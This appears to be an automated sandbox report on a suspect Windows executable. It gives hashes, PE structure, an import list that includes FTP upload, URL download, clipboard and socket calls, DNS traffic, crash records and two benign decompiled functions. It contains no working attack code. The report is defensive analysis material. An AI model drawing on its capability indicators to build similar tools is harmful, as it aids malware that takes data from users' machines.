Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.1.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER65FB.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4597
Entropy (8bit):	4.461112344435761
Encrypted:	false
SSDEEP:	48:cvIwSD8zsjtJgtWI9LrWSC8BT8fm8M4JSHd8lFb+q8r3Y70UHj+d:uITfjHYaSNyJS987q3+DHj+d
MD5:	5D91C01CE7A87CC544F3B72FE1EB4DD3
SHA1:	5E7E5241C6400239CB4406316B6AF0FE2FF95FF4
SHA-256:	E6BA6B6FBB2687EBA4F1DEE10D64EE7B7AB566032F570DB75477951426E4CA36
SHA-512:	99990EB14ED48B65E833CF3F67CE36E24912B5DBE627BE1AC8340D8BB7970D10593D05634FE7290EACE6311B042C2690EB720E197B5786DA8057BDDDD2E596F7
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874730" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	3.300468788976393
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	executable.4420.exe
File size:	438272
MD5:	6192cfbe8e44360f7c0b6f696206f41d
SHA1:	166886066ffabb76f6b72c4b4ed91fa19e59987a
SHA256:	8e353600579959f0507d00376d2e56e8c9a24648b2574ee72fa81dec5d70874a
SHA512:	d492b9ea094bd6e695a562a855587feaf793be0cb35cf28df681a0022a8e0139a222a68bd578fb65b125fe9fea86f1f596bf337e65a445e8a5286d95ae037857
SSDEEP:	3072:U+NvJwwbI7mZgauugh+KsvkfGDLNj58E2wL6uEXKIwjwxhfgtRlh:9swbYmZgarrKsvVDR5POuE6Iwqf4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u....R...R...R.].R...R.c.R...R.]>R...R.\.R...R.`.R...R\c.R...R.`.R...R.`.R...R.Y.R...R...R.}.R%\.R...R...R...R.Y.R...R.y.R...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x43e7ae
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x47299316 [Thu Nov 1 08:49:26 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	4dc9b0b4e019be52f23cc9a3c195910d

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0044A588h
push 0043E91Eh
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00444824h]
pop ecx
or dword ptr [00455C18h], FFFFFFFFh
or dword ptr [00455C1Ch], FFFFFFFFh
call dword ptr [004447B4h]
mov ecx, dword ptr [00455BF8h]
mov dword ptr [eax], ecx
call dword ptr [00444754h]
mov ecx, dword ptr [00455BF4h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00444758h]
mov eax, dword ptr [eax]
mov dword ptr [00455C14h], eax
call 00007F4964A1E080h
cmp dword ptr [004550A0h], ebx
jne 00007F4964A47B0Eh
push 0043E948h
call dword ptr [0044475Ch]
pop ecx
call 00007F4964A47C05h
push 00453078h
push 00453074h
call 00007F4964A47BF0h
mov eax, dword ptr [00455BF0h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [00455BECh]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [00444764h]
push 00453070h
push 00453000h
call 00007F4964A47BBDh

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x50b58	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x56000	0x14cf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x44000	0xaa0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x42469	0x43000	False	0.261452746035	COM executable for DOS	3.69971850757	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x44000	0xeb80	0xf000	False	0.221451822917	data	3.38138099515	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x53000	0x2c20	0x3000	False	0.368815104167	data	4.63470137622	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x56000	0x14cf8	0x15000	False	0.0564778645833	data	0.900735057676	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
WININET.dll	FtpPutFileA, InternetConnectA, FtpSetCurrentDirectoryA, FtpCreateDirectoryA, InternetOpenA, InternetGetConnectedState, InternetCloseHandle
MFC42.DLL
MSVCRT.dll	__p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ?terminate@@YAXXZ, _except_handler3, _onexit, __dllonexit, ??1type_info@@UAE@XZ, getenv, strrchr, atoi, _ftol, time, difftime, fabs, floor, strcat, srand, __p__fmode, _stricmp, fopen, fwrite, fclose, strchr, memmove, strncpy, setlocale, isspace, _splitpath, _makepath, strcpy, _strlwr, strstr, wcscmp, strcmp, strncmp, malloc, free, sscanf, strlen, sprintf, _purecall, _CxxThrowException, memcpy, memset, __CxxFrameHandler, __set_app_type, rand, _itoa, wcslen, _setmbcp, _controlfp
KERNEL32.dll	CloseHandle, FlushViewOfFile, ReleaseMutex, WaitForSingleObject, CreateFileMappingA, MapViewOfFile, CreateMutexA, CreateFileA, DeviceIoControl, GetFileSize, MulDiv, lstrlenA, lstrcmpA, lstrcpynA, GlobalReAlloc, GlobalHandle, UnmapViewOfFile, LoadResource, LockResource, GlobalAlloc, GlobalFree, GlobalLock, GlobalUnlock, FindFirstFileA, GetComputerNameA, GetDateFormatA, GetTimeFormatA, GetVersionExA, OpenProcess, GetCurrentThreadId, WideCharToMultiByte, lstrlenW, MultiByteToWideChar, SetCurrentDirectoryA, SetFileTime, GetSystemTime, GetStartupInfoA, InterlockedDecrement, GetProcAddress, LoadLibraryA, FreeLibrary, lstrcpyA, ReadFile, WriteFile, lstrcmpiA, DeleteFileA, GetTimeZoneInformation, SetLastError, Sleep, GetTickCount, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, FileTimeToSystemTime, SetFilePointer, GetFileInformationByHandle, SystemTimeToFileTime, GetLocalTime, CreateProcessA, lstrcatA, EnumResourceNamesA, CopyFileA, GetTempFileNameA, GetTempPathA, LocalFree, FormatMessageA, GetLastError, SizeofResource, RemoveDirectoryA, MoveFileA, CreateDirectoryA, GetSystemDirectoryA, GetModuleFileNameA, GetModuleHandleA, ExpandEnvironmentStringsA, GetCurrentProcessId, FindClose, FindResourceA, FindNextFileA
USER32.dll	GetDlgItemInt, GetDlgItemTextA, MessageBoxA, SetForegroundWindow, FindWindowA, GetWindowTextA, SetClipboardViewer, PostQuitMessage, ChangeClipboardChain, SetMenuDefaultItem, EnableMenuItem, wsprintfA, RegisterHotKey, UnregisterHotKey, LoadImageA, FillRect, DrawTextA, PtInRect, CharLowerA, GetWindowThreadProcessId, AttachThreadInput, CloseClipboard, GetClipboardData, OpenClipboard, IsClipboardFormatAvailable, IsWindowUnicode, LoadStringA, CharUpperBuffA, RedrawWindow, SetWindowLongA, InvalidateRect, MessageBeep, GetDlgCtrlID, DdeFreeStringHandle, IsWindowVisible, GetClassNameA, SendMessageTimeoutA, IsWindow, RegisterWindowMessageA, FindWindowExA, DestroyIcon, AppendMenuA, GetMenuItemCount, GetMenuItemInfoA, GetSubMenu, DrawFrameControl, OffsetRect, DrawIconEx, DrawEdge, GetSystemMetrics, SystemParametersInfoA, GetKeyboardLayout, MapVirtualKeyExA, MapVirtualKeyA, GetKeyNameTextA, EnumChildWindows, GetWindowLongA, IsDlgButtonChecked, GetForegroundWindow, PostMessageA, DdeClientTransaction, DdeGetData, GetSysColor, GetCursorPos, WindowFromPoint, GetCapture, GetWindowRect, GetFocus, InflateRect, CopyRect, DrawFocusRect, SetTimer, GetParent, GetWindowTextLengthA, GetNextDlgTabItem, SetFocus, GetDlgItem, CreatePopupMenu, CheckMenuItem, DdeCreateStringHandleA, GetKeyboardLayoutList, DdeConnect, SendMessageA, EnableWindow, GetDesktopWindow, GetDC, ReleaseDC, DdeFreeDataHandle, DdeDisconnect, DdeInitializeA, DdeUninitialize, KillTimer, DefWindowProcA, IsChild, LoadIconA, SetCursor, LoadCursorA, GetKeyboardLayoutNameA, GetClientRect
GDI32.dll	BitBlt, SelectObject, CreateCompatibleDC, CreatePen, CreateFontIndirectA, Rectangle, GetTextColor, CreateFontA, GetDIBits, CreateCompatibleBitmap, GetTextExtentPoint32A, CreateSolidBrush, SetTextColor, SetBkMode, DeleteDC, CreateDCA, GetStockObject, GetPaletteEntries, GetObjectA, CreateDIBitmap, CreatePalette, RealizePalette, PatBlt, DeleteObject, CreateBitmap
comdlg32.dll	GetOpenFileNameA
ADVAPI32.dll	RegOpenKeyA, RegSetValueExA, RegCreateKeyA, RegQueryValueExA, RegQueryValueA, RegDeleteValueA, RegCloseKey, RegDeleteKeyA, GetUserNameA, RegOpenKeyExA
SHELL32.dll	Shell_NotifyIconA, SHBrowseForFolderA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHFileOperationA, ShellExecuteA, ExtractIconExA
COMCTL32.dll	ImageList_Remove, ImageList_GetImageCount, ImageList_ReplaceIcon, InitCommonControlsEx
ole32.dll	CoUninitialize, CoInitialize, CoCreateInstance, CoFreeUnusedLibraries
OLEAUT32.dll	SysStringLen, VariantInit, VariantClear, SysAllocString, SysFreeString
urlmon.dll	URLDownloadToFileA
WSOCK32.dll	send, recv, closesocket, select, connect, WSACleanup, ntohl, WSAStartup, htons, ioctlsocket, gethostbyname, bind, WSASetLastError, socket, gethostname
MSVCP60.dll	??0_Lockit@std@@QAE@XZ, ??1_Lockit@std@@QAE@XZ
RPCRT4.dll	UuidCreate, UuidToStringA, RpcStringFreeA

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 17:39:25.233937979 CET	51281	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:25.285471916 CET	53	51281	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:26.376651049 CET	49199	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:26.428426981 CET	53	49199	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:28.041127920 CET	50620	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:28.100127935 CET	53	50620	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:28.905944109 CET	64938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:28.973481894 CET	53	64938	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:29.322885990 CET	60152	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:29.392126083 CET	53	60152	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:30.896219969 CET	57544	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:30.944962025 CET	53	57544	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:31.976865053 CET	55984	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:32.029597998 CET	53	55984	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:33.256689072 CET	64185	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:33.305219889 CET	53	64185	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:34.683229923 CET	65110	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:34.736665964 CET	53	65110	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:35.631702900 CET	58361	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:35.680376053 CET	53	58361	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:36.559864044 CET	63492	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:36.617083073 CET	53	63492	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:37.945734978 CET	60831	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:37.994498968 CET	53	60831	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:39.115470886 CET	60100	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:39.164233923 CET	53	60100	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:39.239679098 CET	53195	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:39.288265944 CET	53	53195	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:40.260013103 CET	50141	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:40.308773994 CET	53	50141	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:41.080451965 CET	53023	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:41.129209995 CET	53	53023	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:42.294761896 CET	49563	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:42.354716063 CET	53	49563	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:43.181158066 CET	51352	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:43.232711077 CET	53	51352	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:44.147665024 CET	59349	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:44.196490049 CET	53	59349	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:45.087042093 CET	57084	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:45.135683060 CET	53	57084	8.8.8.8	192.168.2.3
Feb 23, 2021 17:39:58.153821945 CET	58823	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:39:58.212501049 CET	53	58823	8.8.8.8	192.168.2.3
Feb 23, 2021 17:40:05.136533022 CET	57568	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:40:05.185122967 CET	53	57568	8.8.8.8	192.168.2.3
Feb 23, 2021 17:40:18.742022038 CET	50540	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:40:18.799397945 CET	53	50540	8.8.8.8	192.168.2.3
Feb 23, 2021 17:40:27.437750101 CET	54366	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:40:27.509244919 CET	53	54366	8.8.8.8	192.168.2.3
Feb 23, 2021 17:40:46.809015036 CET	53034	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:40:46.857649088 CET	53	53034	8.8.8.8	192.168.2.3
Feb 23, 2021 17:40:52.416899920 CET	57762	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:40:52.480557919 CET	53	57762	8.8.8.8	192.168.2.3
Feb 23, 2021 17:41:21.967437983 CET	55435	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:41:22.018543959 CET	53	55435	8.8.8.8	192.168.2.3
Feb 23, 2021 17:41:23.779164076 CET	50713	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:41:23.839287043 CET	53	50713	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:21.578418970 CET	56132	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:21.638370037 CET	53	56132	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:22.242088079 CET	58987	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:22.302165985 CET	53	58987	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:22.883418083 CET	56579	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:22.943257093 CET	53	56579	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:23.421056032 CET	60633	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:23.480940104 CET	53	60633	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:24.035535097 CET	61292	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:24.092859030 CET	53	61292	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:24.596959114 CET	63619	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:24.646073103 CET	53	63619	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:25.192250013 CET	64938	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:25.252090931 CET	53	64938	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:25.980870962 CET	61946	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:26.029532909 CET	53	61946	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:27.071306944 CET	64910	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:27.119978905 CET	53	64910	8.8.8.8	192.168.2.3
Feb 23, 2021 17:42:27.595020056 CET	52123	53	192.168.2.3	8.8.8.8
Feb 23, 2021 17:42:27.652151108 CET	53	52123	8.8.8.8	192.168.2.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: executable.4420.exe PID: 5412 Parent PID: 5608

General

Start time:	17:39:33
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\executable.4420.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\executable.4420.exe'
Imagebase:	0x400000
File size:	438272 bytes
MD5 hash:	6192CFBE8E44360F7C0B6F696206F41D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: WerFault.exe PID: 2100 Parent PID: 5412

General

Start time:	17:39:35
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 672
Imagebase:	0x7ff7488e0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: executable.4420.exe PID: 5412 Parent PID: 5608 executable.4420.exeCOMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7%
Total number of Nodes:	228
Total number of Limit Nodes:	7

Executed Functions

Function 00428AD2, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 35
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00428AD2(void* __eflags) {
				intOrPtr _t1;
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t6;
				void* _t7;

				_t1 = E00428A6B();
				 *0x455ba0 = _t1;
				if(_t1 == 0) {
					L6:
					return 0;
				} else {
					_t3 = LoadLibraryA("psapi.dll"); // executed
					 *0x455ba4 = _t3;
					if(_t3 == 0) {
						goto L6;
					} else {
						 *0x455bac = GetProcAddress(_t3, "EnumProcessModules");
						 *0x455ba8 = GetProcAddress( *0x455ba4, "GetModuleFileNameExA");
						_t6 = GetProcAddress( *0x455ba4, "EnumProcesses");
						 *0x455bb0 = _t6;
						if( *0x455bac == 0 ||  *0x455ba8 == 0 || _t6 == 0) {
							goto L6;
						} else {
							_t7 = 1;
							return _t7;
						}
					}
				}
			}

0x00428ad2
0x00428ad9
0x00428ade
0x00428b47
0x00428b49
0x00428ae0
0x00428ae5
0x00428aed
0x00428af2
0x00000000
0x00428af4
0x00428b08
0x00428b1a
0x00428b25
0x00428b2e
0x00428b34
0x00000000
0x00428b43
0x00428b45
0x00428b46
0x00428b46
0x00428b34
0x00428af2

APIs

Part of subcall function 00428A6B: GetVersionExA.KERNEL32(?), ref: 00428A85

LoadLibraryA.KERNELBASE(psapi.dll,0041FE5E), ref: 00428AE5
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00428B01
GetProcAddress.KERNEL32(GetModuleFileNameExA), ref: 00428B13
GetProcAddress.KERNEL32(EnumProcesses), ref: 00428B25

Strings

EnumProcesses, xrefs: 00428B15
EnumProcessModules, xrefs: 00428AFB
psapi.dll, xrefs: 00428AE0
GetModuleFileNameExA, xrefs: 00428B03

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressProc$LibraryLoadVersion
String ID: EnumProcessModules$EnumProcesses$GetModuleFileNameExA$psapi.dll
API String ID: 1968650500-3062786360
Opcode ID: f060149e132810915e641629d8c78e5ec8218e828fa11d84e69ada51e686cae7
Instruction ID: 5c9e6db52fca0022f8977f22b24905a990c7f778f2a21f598c3b04332453e4a3
Opcode Fuzzy Hash: f060149e132810915e641629d8c78e5ec8218e828fa11d84e69ada51e686cae7
Instruction Fuzzy Hash: 3CF0ECB06027249FD7115B21FC2A77A7EA4AB40706F94003FB900DA5A2DB78A484DB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00428DCB, Relevance: 4.5, APIs: 3, Instructions: 24
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00428DCB(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				void* _t7;
				void* _t9;

				memset( &_v324, 0, 0x140);
				_t7 = FindFirstFileA(_a4,  &_v324); // executed
				if(_t7 != 0xffffffff) {
					FindClose(_t7);
					_t9 = 1;
					return _t9;
				} else {
					return 0;
				}
			}

0x00428de2
0x00428df4
0x00428dfd
0x00428e04
0x00428e0c
0x00428e0e
0x00428dff
0x00428e02
0x00428e02

APIs

memset.MSVCRT ref: 00428DE2
FindFirstFileA.KERNELBASE(?,?), ref: 00428DF4
FindClose.KERNEL32(00000000), ref: 00428E04

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Find$CloseFileFirstmemset
String ID:
API String ID: 2611062832-0
Opcode ID: d6f0edde9df49e277392e37ccd00278349f30f8cddbbda18d330cbcca89b8f45
Instruction ID: f196aed3ee99aef89ef7abe1f0f0b5db278bb693bbe45fd8c5518458ceb93445
Opcode Fuzzy Hash: d6f0edde9df49e277392e37ccd00278349f30f8cddbbda18d330cbcca89b8f45
Instruction Fuzzy Hash: 3CE0867190010466DB1157B2AC4BBDA366C5718318F400661FB19D50E0E7B5E5944AD4

Uniqueness

